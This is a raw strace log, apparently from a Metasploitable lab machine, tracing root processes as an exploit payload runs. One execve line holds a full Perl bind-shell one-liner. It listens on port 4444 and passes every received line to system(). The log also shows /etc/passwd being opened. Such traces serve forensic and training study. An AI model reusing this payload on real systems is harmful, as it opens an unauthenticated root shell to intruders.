10193 07:31:50.877636 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

10193 07:31:50.877651 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10193 07:31:50.877740 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

10193 07:31:50.877757 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e02000

10193 07:31:50.877769 mmap2(0xb7e0b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7e0b000

10193 07:31:50.877784 close(1)          = 0

10193 07:31:50.877805 munmap(0xb7fbd000, 29913) = 0

10193 07:31:50.877821 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

10193 07:31:50.877835 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

10193 07:31:50.877847 _llseek(1, 0, [0], SEEK_CUR) = 0

10193 07:31:50.877875 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

10193 07:31:50.877923 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7fc4000

10193 07:31:50.877950 _llseek(1, 1624, [1624], SEEK_SET) = 0

10193 07:31:50.877966 munmap(0xb7fc4000, 1624) = 0

10193 07:31:50.877976 close(1)          = 0

10193 07:31:50.878004 getpgrp()         = 3831

10193 07:31:50.878014 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

10193 07:31:50.878030 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

10193 07:31:50.878046 brk(0x8101000)    = 0x8101000

10193 07:31:50.878077 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10193 07:31:50.878092 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10193 07:31:50.878106 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10193 07:31:50.878143 brk(0x8102000)    = 0x8102000

10193 07:31:50.878169 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10193 07:31:50.878188 stat64("/sbin/AB", 0xbf918f68) = -1 ENOENT (No such file or directory)

10193 07:31:50.878200 stat64("/bin/AB", 0xbf918f68) = -1 ENOENT (No such file or directory)

10193 07:31:50.878211 stat64("/usr/sbin/AB", 0xbf918f68) = -1 ENOENT (No such file or directory)

10193 07:31:50.878223 stat64("/usr/bin/AB", 0xbf918f68) = -1 ENOENT (No such file or directory)

10193 07:31:50.878240 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10193 07:31:50.878255 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e386f8) = 10194

10194 07:31:50.878299 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10194 07:31:50.878315 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10194 07:31:50.878328 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10194 07:31:50.878340 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10194 07:31:50.878414 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10194 07:31:50.878433 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10194 07:31:50.878461 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10194 07:31:50.878516 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

10194 07:31:50.878531 --- SIGPIPE (Broken pipe) @ 0 (0) ---

10194 07:31:50.878600 exit_group(127)   = ?

4519  07:31:50.904832 waitpid(10193,  <unfinished ...>

10193 07:31:50.914024 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10193 07:31:50.914025 --- SIGCHLD (Child exited) @ 0 (0) ---

10193 07:31:50.914025 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10194

10193 07:31:50.914025 waitpid(-1, 0xbf918be8, WNOHANG) = -1 ECHILD (No child processes)

10193 07:31:50.914025 sigreturn()       = ? (mask now [])

10193 07:31:50.914045 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10193 07:31:50.914060 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10193 07:31:50.914071 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10193 07:31:50.914083 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

10193 07:31:50.914102 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10193 07:31:50.914113 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

10193 07:31:50.914148 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10193 07:31:50.914169 stat64("/sbin/perl", 0xbf918f98) = -1 ENOENT (No such file or directory)

10193 07:31:50.914181 stat64("/bin/perl", 0xbf918f98) = -1 ENOENT (No such file or directory)

10193 07:31:50.914192 stat64("/usr/sbin/perl", 0xbf918f98) = -1 ENOENT (No such file or directory)

10193 07:31:50.914204 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10193 07:31:50.914222 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10193 07:31:50.914247 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10193 07:31:50.914261 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e386f8) = 10195

10195 07:31:50.914326 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10195 07:31:50.914374 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10195 07:31:50.914404 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10195 07:31:50.914433 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10195 07:31:50.914449 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10195 07:31:50.914464 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10195 07:31:50.914477 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10195 07:31:50.914511 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

10195 07:31:50.914600 brk(0)            = 0x8153000

10195 07:31:50.914621 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10195 07:31:50.914636 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f28000

10195 07:31:50.914652 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10195 07:31:50.914670 open("/etc/ld.so.cache", O_RDONLY) = 1

10195 07:31:50.914683 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10195 07:31:50.914699 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f20000

10195 07:31:50.914709 close(1)          = 0

10195 07:31:50.914720 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10195 07:31:50.914740 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10195 07:31:50.914755 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10195 07:31:50.914902 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10195 07:31:50.914920 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f1c000

10195 07:31:50.914932 mmap2(0xb7f1e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f1e000

10195 07:31:50.914948 close(1)          = 0

10195 07:31:50.914959 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10195 07:31:50.914973 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

10195 07:31:50.914987 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

10195 07:31:50.915073 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

10195 07:31:50.915090 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ef7000

10195 07:31:50.915101 mmap2(0xb7f1a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f1a000

10195 07:31:50.915116 close(1)          = 0

10195 07:31:50.915128 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10195 07:31:50.915141 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

10195 07:31:50.915155 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

10195 07:31:50.915242 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

10195 07:31:50.915259 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef6000

10195 07:31:50.915271 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ede000

10195 07:31:50.915282 mmap2(0xb7ef2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7ef2000

10195 07:31:50.915296 mmap2(0xb7ef4000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ef4000

10195 07:31:50.915322 close(1)          = 0

10195 07:31:50.915364 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10195 07:31:50.915378 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10195 07:31:50.915425 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10195 07:31:50.915610 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10195 07:31:50.915629 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d8f000

10195 07:31:50.915641 mmap2(0xb7ed8000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ed8000

10195 07:31:50.915657 mmap2(0xb7edb000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7edb000

10195 07:31:50.915670 close(1)          = 0

10195 07:31:50.915682 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10195 07:31:50.915695 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

10195 07:31:50.915710 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

10195 07:31:50.915812 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

10195 07:31:50.915856 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d5d000

10195 07:31:50.915868 mmap2(0xb7d66000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d66000

10195 07:31:50.915896 mmap2(0xb7d68000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d68000

10195 07:31:50.915910 close(1)          = 0

10195 07:31:50.915933 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d5c000

10195 07:31:50.915945 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d5c8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10195 07:31:50.916005 mprotect(0xb7ed8000, 4096, PROT_READ) = 0

10195 07:31:50.916032 munmap(0xb7f20000, 29913) = 0

10195 07:31:50.916045 set_tid_address(0xb7d5c908) = 10195

10195 07:31:50.916054 set_robust_list(0xb7d5c910, 0xc) = 0

10195 07:31:50.916063 futex(0xbfc578f0, 0x81 /* FUTEX_??? */, 1) = 0

10195 07:31:50.916077 rt_sigaction(SIGRTMIN, {0xb7ee22c0, [], SA_SIGINFO}, NULL, 8) = 0

10195 07:31:50.916090 rt_sigaction(SIGRT_1, {0xb7ee2340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

10195 07:31:50.916103 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

10195 07:31:50.916116 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

10195 07:31:50.916135 uname({sys="Linux", node="metasploitable", ...}) = 0

10195 07:31:50.916181 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

10195 07:31:50.916226 brk(0)            = 0x8153000

10195 07:31:50.916236 brk(0x8174000)    = 0x8174000

10195 07:31:50.916280 getuid32()        = 0

10195 07:31:50.916290 geteuid32()       = 0

10195 07:31:50.916310 getgid32()        = 0

10195 07:31:50.916319 getegid32()       = 0

10195 07:31:50.916400 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d3b000

10195 07:31:50.916428 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

10195 07:31:50.916445 read(1, "\240\334\4\201", 4) = 4

10195 07:31:50.916458 close(1)          = 0

10195 07:31:50.916476 time(NULL)        = 1495625510

10195 07:31:50.916516 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfc575c0) = -1 ENOENT (No such file or directory)

10195 07:31:50.916535 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfc575c0) = -1 ENOENT (No such file or directory)

10195 07:31:50.916548 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfc575c0) = -1 ENOENT (No such file or directory)

10195 07:31:50.916563 stat64("/usr/local/lib/perl/5.8.7", 0xbfc57700) = -1 ENOENT (No such file or directory)

10195 07:31:50.916576 stat64("/usr/local/share/perl/5.8.7", 0xbfc57700) = -1 ENOENT (No such file or directory)

10195 07:31:50.916588 stat64("/usr/local/lib/perl/5.8.6", 0xbfc57700) = -1 ENOENT (No such file or directory)

10195 07:31:50.916599 stat64("/usr/local/share/perl/5.8.6", 0xbfc57700) = -1 ENOENT (No such file or directory)

10195 07:31:50.916611 stat64("/usr/local/lib/perl/5.8.4", 0xbfc57700) = -1 ENOENT (No such file or directory)

10195 07:31:50.916623 stat64("/usr/local/share/perl/5.8.4", 0xbfc57700) = -1 ENOENT (No such file or directory)

10195 07:31:50.916634 stat64("/usr/local/lib/perl/5.8.3", 0xbfc57700) = -1 ENOENT (No such file or directory)

